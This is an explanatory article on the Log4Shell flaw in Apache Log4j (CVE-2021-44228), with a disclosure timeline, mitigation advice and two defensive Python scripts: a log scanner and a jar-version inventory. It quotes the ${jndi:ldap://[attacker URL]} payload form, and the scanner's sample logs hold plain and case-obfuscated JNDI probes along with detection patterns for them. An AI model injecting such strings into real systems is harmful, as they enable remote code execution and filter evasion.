Log4j Vulnerability

Did you know that since December 10, days after industry experts discovered a critical vulnerability known as Log4Shell in servers supporting the game Minecraft, attackers have made millions of attempts to exploit Log4j? According to one team tracking the impact, the vulnerability potentially threatens millions more applications and devices across the globe.

In this article, we’ll answer some frequently asked questions about the Log4Shell vulnerability.

The internet vulnerability Log4Shell, which affects millions of machines, lies in Log4j, an obscure but practically ubiquitous piece of software. The software is used to record a variety of operations that occur behind the scenes in many different computer systems.

So, what exactly is this seemingly benign piece of internet infrastructure, how can hackers take advantage of it, and what kind of havoc might it cause?

What exactly is Log4j?

Log4j is a piece of software that allows programmes to keep track of their previous actions. Developers frequently leverage existing programmes like Log4j instead of reinventing a logging or record-keeping component each time they create new software. It is available for free on the Internet and is extensively utilised, with a substantial chunk of Internet services using it.

Log4j keeps track of events, such as errors and ordinary system processes, and sends out diagnostic warnings to system administrators and users. It is open-source software provided by the Apache Software Foundation.

When you type in or click on a bad web link and get a 404 error message, that’s an example of Log4j at work. The web server that hosts the domain of the link you attempted to access reports that there is no such web page, and it also uses Log4j to log the occurrence for the server’s system administrators.

When did the original vulnerability in the Log4j library become known to experts?

The vulnerability was first disclosed to the Apache Foundation (an open-source organisation) on November 24 by security researcher Chen Zhaojun of Alibaba, China’s largest e-commerce giant. Researchers identified the attack on servers hosting the game Minecraft on December 9th. Following further forensic investigation, they revealed that fraudsters had discovered the hole earlier and had been using it since as early as December 1, 2021.

On December 10th, 2021, NIST published a serious CVE in the National Vulnerability Database, CVE-2021-44228. The Apache Software Foundation assigned a CVSS severity rating of 10 to this vulnerability.

The flaw allows for remote code execution without authentication. Attackers can exploit it by simply inserting a line of text such as ${jndi:ldap://[attacker URL]} into data that the application logs. This flaw has been discovered in the products of some of the most well-known technology companies, including AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMware.

How does it work?

Log4Shell works by exploiting a Log4j feature that allows users to embed custom lookup code in log messages for formatting. If a separate server keeps a directory linking usernames and real names, this feature allows Log4j to log not just the username associated with each attempt to log in to the server, but also the person’s real name. To accomplish this, the Log4j server must communicate with the server that stores the real names.

This type of code, however, can be used for more than merely formatting log messages. Third-party servers can supply software code that Log4j fetches and runs, and that code can conduct a variety of tasks on the targeted machine. This allows for criminal operations such as stealing sensitive data, seizing control of the targeted system, and spreading malicious content to other users communicating with the affected server.
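The practical detection problem that follows from the description above is spotting the lookup strings in whatever your servers log (web access logs, user-agent and header values, form fields). The script below is an added example, not code from the original article or from the Log4j project; the log lines in it are constructed for the demonstration. It normalises the nested lower/upper and default-value lookups that Log4j itself would evaluate before the jndi token appears, so that the check is not defeated by a payload that spells the token indirectly, and then reports which lines contain a JNDI lookup.

```python
import re

# Constructed sample log lines (not real traffic): one benign request,
# one with a plain JNDI lookup in the User-Agent, and one that hides the
# "jndi" token behind nested ${lower:...} lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:l}dap://example.invalid/b}"',
]

# Innermost ${lower:X} / ${upper:X} lookups (no nested braces inside).
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Innermost ${name:-default} lookups; Log4j substitutes the default when the
# named value is unset, so ${::-j} or ${env:UNSET:-j} both become "j".
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The token we actually care about once the nesting is resolved.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _apply_case(match: "re.Match[str]") -> str:
    """Evaluate one lower/upper lookup the way Log4j would."""
    value = match.group(2)
    return value.lower() if match.group(1).lower() == "lower" else value.upper()


def normalize(text: str) -> str:
    """Repeatedly collapse innermost lookups until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(_apply_case, text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalisation."""
    return bool(JNDI_PATTERN.search(normalize(line)))


def scan(lines):
    """Return (1-based line number, line) for every line flagged as a probe."""
    return [(i, line) for i, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup found -> {normalize(line)}")
```

Running the script flags lines 2 and 3 of the constructed sample and leaves the benign request alone. The normalisation deliberately handles only the lookup types that produce plain text (lower, upper and defaults); that keeps the matcher simple while still catching the indirect spellings that a bare search for the literal string "jndi" would miss.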

Log4j is all over the place

Log4j’s position in the software ecosystem is one of the primary problems. Because logging is a standard part of most applications, Log4j is widely used: it is found in a wide range of programmes, from software development tools to security products, and in cloud services like Apple iCloud and AWS.

As a result, hackers have a wide range of targets to choose from, including ordinary people, service providers, source code developers, and even security experts. While large corporations like Amazon can swiftly patch their web services to stop hackers from exploiting them, many other enterprises will take longer to do so, and some may not even realise they need to.

How do we mitigate the risks?

  • Patch – The vendor has provided a patch, and customers are urged to update their Log4j to version 2.17.0 if possible.
  • Firewall – Using outbound firewall rules on servers to block connections that the server itself initiates is an effective mitigation method. If the server can still perform DNS lookups, an attacker’s scan for susceptible log4j2 instances will trigger that DNS lookup even when other outbound traffic is blocked, so DNS traffic is worth monitoring as well. Although attackers may find ways around firewalls, having one can help protect you by blocking the outgoing connections of a real attack.
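Before you can apply the patch you have to know where Log4j actually sits on a host, and the "many enterprises may not realise they need to" problem above is usually an inventory problem. The script below is an added example, not code from the original article or from the Log4j project: it walks a directory tree for log4j-core jars, reads the version from each jar’s manifest (falling back to the file name), and classifies the jar against the 2.17.0 target the article gives. It also checks whether the JndiLookup class is present, because removing that class from the jar was Apache’s published workaround for installations that could not be upgraded immediately. The sample jars it scans are constructed in a temporary directory for the demonstration.

```python
import os
import re
import tempfile
import zipfile

# The article's stated safe version; anything below it is reported as needing an update.
FIXED_VERSION = (2, 17, 0)
# Class whose removal was Apache's documented workaround for unpatchable installs.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text: str) -> tuple:
    """Turn '2.14.1' or '2.3' into a comparable three-part tuple."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts) + (0,) * (3 - len(parts))


def jar_version(path: str):
    """Return (version string or None, True if JndiLookup.class is in the jar)."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            for line in manifest.splitlines():
                if line.lower().startswith("implementation-version:"):
                    version = line.split(":", 1)[1].strip()
                    break
        if version is None:
            # Fall back to the conventional log4j-core-<version>.jar file name.
            match = re.search(r"log4j-core-(\d+(?:\.\d+){1,2})", os.path.basename(path))
            version = match.group(1) if match else None
        return version, JNDI_LOOKUP_CLASS in names


def assess_jar(path: str) -> str:
    """Classify one jar: patched, vulnerable, mitigated-class-removed or unknown-version."""
    version, has_jndi_lookup = jar_version(path)
    if version is None:
        return "unknown-version"
    if parse_version(version) >= FIXED_VERSION:
        return "patched"
    return "vulnerable" if has_jndi_lookup else "mitigated-class-removed"


def scan_tree(root: str) -> dict:
    """Map every log4j-core jar under root to its assessment."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                findings[path] = assess_jar(path)
    return findings


def build_sample_tree() -> str:
    """Create constructed (fake) log4j-core jars in a temp dir for the demonstration."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    samples = {
        os.path.join("app1", "lib", "log4j-core-2.14.1.jar"): ("2.14.1", True),
        os.path.join("app2", "lib", "log4j-core-2.17.0.jar"): ("2.17.0", True),
        os.path.join("app3", "lib", "log4j-core-2.14.1.jar"): ("2.14.1", False),
    }
    for relative, (version, keep_class) in samples.items():
        path = os.path.join(root, relative)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as jar:
            jar.writestr("META-INF/MANIFEST.MF",
                         f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
            if keep_class:
                jar.writestr(JNDI_LOOKUP_CLASS, b"")  # empty stand-in for the real class
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for jar_path, verdict in sorted(scan_tree(sample_root).items()):
        print(f"{verdict:24} {os.path.relpath(jar_path, sample_root)}")
```

Point scan_tree at a real application directory to get an inventory; jars bundled inside other archives (a .war or shaded fat jar) are not unpacked here, so extend the walk if your deployments nest them. The 2.17.0 threshold is the one the article gives; the older 2.3.x and 2.12.x branches of Log4j received their own separate fixed releases, so adjust FIXED_VERSION if you maintain those.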

Steve Byrom